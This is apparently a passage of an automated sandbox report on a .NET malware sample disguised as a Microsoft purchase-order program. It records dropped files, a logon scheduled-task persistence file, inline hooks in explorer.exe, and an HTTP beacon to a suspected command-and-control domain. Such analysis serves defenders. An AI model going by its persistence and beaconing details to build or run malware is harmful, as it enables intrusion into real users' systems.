                                  • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, browser.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, afdo-tas-offload.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcoleus04.cloudapp.net, l-0014.l-msedge.net, e16646.dscg.akamaiedge.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, browser.pipe.aria.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  18:52:16API Interceptor1x Sleep call for process: PO07262021.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO07262021.exe.log
                                  Process:C:\Users\user\Desktop\PO07262021.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):1314
                                  Entropy (8bit):5.350128552078965
                                  Encrypted:false
                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                  Malicious:true
                                  Reputation:high, very likely benign file
                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                  C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp
                                  Process:C:\Users\user\Desktop\PO07262021.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1644
                                  Entropy (8bit):5.19094573353388
                                  Encrypted:false
                                  SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBG8tn:cbhK79lNQR/rydbz9I3YODOLNdq33
                                  MD5:23D2D2B433F0ED44159491AFDD24534F
                                  SHA1:E70CB7AC5A0D0EB8BFD3352D0A4CFF41B3BB251B
                                  SHA-256:DB595180719394A5059F3AB34F47925DFEFB13B7C5F7017CD4E269D3EDFCA22A
                                  SHA-512:D9A3B13061BF0CE4FC39426C390C9D02A421BC78D6FFB83E47C9620E7B0E4911B938C8BA798A6A7821230ECC987EC674C2D951894F3980D44B029B398E8FAF3F
                                  Malicious:true
                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                  C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe
                                  Process:C:\Users\user\Desktop\PO07262021.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):978432
                                  Entropy (8bit):6.936798195289582
                                  Encrypted:false
                                  SSDEEP:24576:aZWQnL8RS/d3YK64JZBVGbDGLPWNfac2SppPr7:aoQnQK64JIbQchpZ
                                  MD5:47A679EC6799A5A2C9212DE73D404A83
                                  SHA1:D21C87A07B4701DDF3206AEB534D010DD928116B
                                  SHA-256:C2E765B8A42432E042DA5C444BDBA20B8021BD5E1B022693978B6540FDBDDEC7
                                  SHA-512:20133EAA9C49F4239684703F312413F1AB1AA4868E2DC0636F449903A27B9C7686E62093EBE8DBF588C9D159FA47F790CEEBA58FFDFC791FC753B25552458763
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: Metadefender, Detection: 11%, Browse
                                  • Antivirus: ReversingLabs, Detection: 74%
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e..a..............P.................. ... ....@.. .......................`............@.....................................O.... .. ....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc... .... ......................@..@.reloc.......@......................@..B........................H........>..t............O...............................................0............("...(#.........(.....o$....*.....................(%......(&......('......((......()....*N..(....ov...(*....*&..(+....*.s,........s-........s.........s/........s0........*....0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*.0...........~....o5....+..*.0..<........~.....(6.....,!r...p.....(7...o8...s9............~.....+..*.0......
                                  C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe:Zone.Identifier
                                  Process:C:\Users\user\Desktop\PO07262021.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview: [ZoneTransfer]....ZoneId=0

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):6.936798195289582
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Windows Screen Saver (13104/52) 0.07%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  File name:PO07262021.exe
                                  File size:978432
                                  MD5:47a679ec6799a5a2c9212de73d404a83
                                  SHA1:d21c87a07b4701ddf3206aeb534d010dd928116b
                                  SHA256:c2e765b8a42432e042da5c444bdba20b8021bd5e1b022693978b6540fdbddec7
                                  SHA512:20133eaa9c49f4239684703f312413f1ab1aa4868e2dc0636f449903a27b9c7686e62093ebe8dbf588c9d159fa47f790ceeba58ffdfc791fc753b25552458763
                                  SSDEEP:24576:aZWQnL8RS/d3YK64JZBVGbDGLPWNfac2SppPr7:aoQnQK64JIbQchpZ
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e..a..............P.................. ... ....@.. .......................`............@................................

                                  File Icon

                                  Icon Hash:00828e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x4f011e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x61019565 [Wed Jul 28 17:35:33 2021 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:v4.0.30319
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xf00cc0x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf20000x620.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000xee1240xee200False0.606308439961data6.94520727658IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rsrc0xf20000x6200x800False0.32958984375data3.45050290848IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0xf40000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_VERSION0xf20900x390data
                                  RT_MANIFEST0xf24300x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Version Infos

                                  DescriptionData
                                  Translation0x0000 0x04b0
                                  LegalCopyrightCopyright Microsoft 2014
                                  Assembly Version1.0.0.0
                                  InternalNamecAlternateFileNameeFixedBuff.exe
                                  FileVersion1.0.0.0
                                  CompanyNameMicrosoft
                                  LegalTrademarks
                                  Comments
                                  ProductNameQManager
                                  ProductVersion1.0.0.0
                                  FileDescriptionQManager
                                  OriginalFilenamecAlternateFileNameeFixedBuff.exe

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  08/03/21-18:53:29.146784TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.4

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 3, 2021 18:53:29.010590076 CEST4976380192.168.2.434.102.136.180
                                  Aug 3, 2021 18:53:29.028125048 CEST804976334.102.136.180192.168.2.4
                                  Aug 3, 2021 18:53:29.028268099 CEST4976380192.168.2.434.102.136.180
                                  Aug 3, 2021 18:53:29.028569937 CEST4976380192.168.2.434.102.136.180
                                  Aug 3, 2021 18:53:29.045883894 CEST804976334.102.136.180192.168.2.4
                                  Aug 3, 2021 18:53:29.146784067 CEST804976334.102.136.180192.168.2.4
                                  Aug 3, 2021 18:53:29.153759003 CEST804976334.102.136.180192.168.2.4
                                  Aug 3, 2021 18:53:29.158879042 CEST4976380192.168.2.434.102.136.180
                                  Aug 3, 2021 18:53:29.158911943 CEST4976380192.168.2.434.102.136.180
                                  Aug 3, 2021 18:53:29.176242113 CEST804976334.102.136.180192.168.2.4

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 3, 2021 18:51:46.121824026 CEST6524853192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:46.147903919 CEST53652488.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:47.686245918 CEST5372353192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:47.720567942 CEST53537238.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:47.727993965 CEST6464653192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:47.774971008 CEST53646468.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:47.925136089 CEST6529853192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:47.951296091 CEST53652988.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:48.410027027 CEST5912353192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:48.419707060 CEST5453153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:48.420351982 CEST4971453192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:48.438412905 CEST53591238.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:48.448441982 CEST53497148.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:48.454945087 CEST53545318.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:48.520040989 CEST5802853192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:48.549252987 CEST53580288.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:49.039613008 CEST5309753192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:49.072258949 CEST53530978.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:49.447227955 CEST4925753192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:49.474684000 CEST53492578.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:50.356818914 CEST6238953192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:50.390780926 CEST53623898.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:51.495162964 CEST4991053192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:51.519674063 CEST53499108.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:52.058604002 CEST5585453192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:52.101710081 CEST53558548.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:53.910123110 CEST6454953192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:53.939091921 CEST53645498.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:55.449043989 CEST6315353192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:55.484652042 CEST53631538.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:56.824932098 CEST5299153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:56.852077007 CEST53529918.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:05.293577909 CEST5370053192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:05.327514887 CEST53537008.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:06.481507063 CEST5172653192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:06.507814884 CEST53517268.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:08.083612919 CEST5679453192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:08.117964029 CEST53567948.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:09.588361979 CEST5653453192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:09.613306999 CEST53565348.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:11.381350994 CEST5662753192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:11.406028986 CEST53566278.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:12.478653908 CEST5662153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:12.503277063 CEST53566218.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:13.703202009 CEST6311653192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:13.738840103 CEST53631168.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:14.734769106 CEST6407853192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:14.762212038 CEST53640788.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:15.860750914 CEST6480153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:15.885740995 CEST53648018.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:17.110126972 CEST6172153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:17.137916088 CEST53617218.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:18.289582014 CEST5125553192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:18.314517975 CEST53512558.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:21.973252058 CEST6152253192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:22.016247034 CEST53615228.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:39.581326962 CEST5233753192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:39.609390020 CEST53523378.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:43.970092058 CEST5504653192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:44.021986008 CEST53550468.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:44.872072935 CEST4961253192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:44.907341957 CEST53496128.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:46.147723913 CEST4928553192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:46.214654922 CEST53492858.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:47.715107918 CEST5060153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:47.747746944 CEST53506018.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:48.203564882 CEST6087553192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:48.237333059 CEST53608758.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:48.388839006 CEST5644853192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:48.448848009 CEST53564488.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:48.680263996 CEST5917253192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:48.715400934 CEST53591728.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:49.484009027 CEST6242053192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:49.516335011 CEST53624208.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:50.170617104 CEST6057953192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:50.204503059 CEST53605798.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:50.964178085 CEST5018353192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:50.999627113 CEST53501838.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:51.698477983 CEST6153153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:51.733748913 CEST53615318.8.8.8192.168.2.4
                                  Aug 3, 2021 18:53:06.767503977 CEST4922853192.168.2.48.8.8.8
                                  Aug 3, 2021 18:53:06.802436113 CEST53492288.8.8.8192.168.2.4
                                  Aug 3, 2021 18:53:28.954497099 CEST5979453192.168.2.48.8.8.8
                                  Aug 3, 2021 18:53:28.998214960 CEST53597948.8.8.8192.168.2.4
                                  Aug 3, 2021 18:53:31.699553013 CEST5591653192.168.2.48.8.8.8
                                  Aug 3, 2021 18:53:31.734924078 CEST53559168.8.8.8192.168.2.4
                                  Aug 3, 2021 18:53:34.259422064 CEST5275253192.168.2.48.8.8.8
                                  Aug 3, 2021 18:53:34.308335066 CEST53527528.8.8.8192.168.2.4
                                  Aug 3, 2021 18:53:49.361268997 CEST6054253192.168.2.48.8.8.8
                                  Aug 3, 2021 18:53:49.405272961 CEST53605428.8.8.8192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Aug 3, 2021 18:53:28.954497099 CEST192.168.2.48.8.8.80xe77eStandard query (0)www.winabeel.comA (IP address)IN (0x0001)
                                  Aug 3, 2021 18:53:49.361268997 CEST192.168.2.48.8.8.80xcf42Standard query (0)www.ppneumatic.comA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Aug 3, 2021 18:53:28.998214960 CEST8.8.8.8192.168.2.40xe77eNo error (0)www.winabeel.comwinabeel.comCNAME (Canonical name)IN (0x0001)
                                  Aug 3, 2021 18:53:28.998214960 CEST8.8.8.8192.168.2.40xe77eNo error (0)winabeel.com34.102.136.180A (IP address)IN (0x0001)
                                  Aug 3, 2021 18:53:49.405272961 CEST8.8.8.8192.168.2.40xcf42Name error (3)www.ppneumatic.comnonenoneA (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • www.winabeel.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.44976334.102.136.18080C:\Windows\explorer.exe
                                  TimestampkBytes transferredDirectionData
                                  Aug 3, 2021 18:53:29.028569937 CEST8791OUTGET /nmks/?6latBtaX=AODdElP/LvmD82bfBWBMQGTCd+0C8NCj5PjqI400wXLHipc47/wHi7nKSi/3AqembaQc&v2M=nRRXGl0p HTTP/1.1
                                  Host: www.winabeel.com
                                  Connection: close
                                  Data Raw: 00 00 00 00 00 00 00
                                  Data Ascii:
                                  Aug 3, 2021 18:53:29.146784067 CEST8791INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Tue, 03 Aug 2021 16:53:29 GMT
                                  Content-Type: text/html
                                  Content-Length: 275
                                  ETag: "6104831f-113"
                                  Via: 1.1 google
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                  Code Manipulations

                                  User Modules

                                  Hook Summary

                                  Function NameHook TypeActive in Processes
                                  PeekMessageAINLINEexplorer.exe
                                  PeekMessageWINLINEexplorer.exe
                                  GetMessageWINLINEexplorer.exe
                                  GetMessageAINLINEexplorer.exe

                                  Processes

                                  Process: explorer.exe, Module: user32.dll
                                  Function NameHook TypeNew Data
                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                  GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB
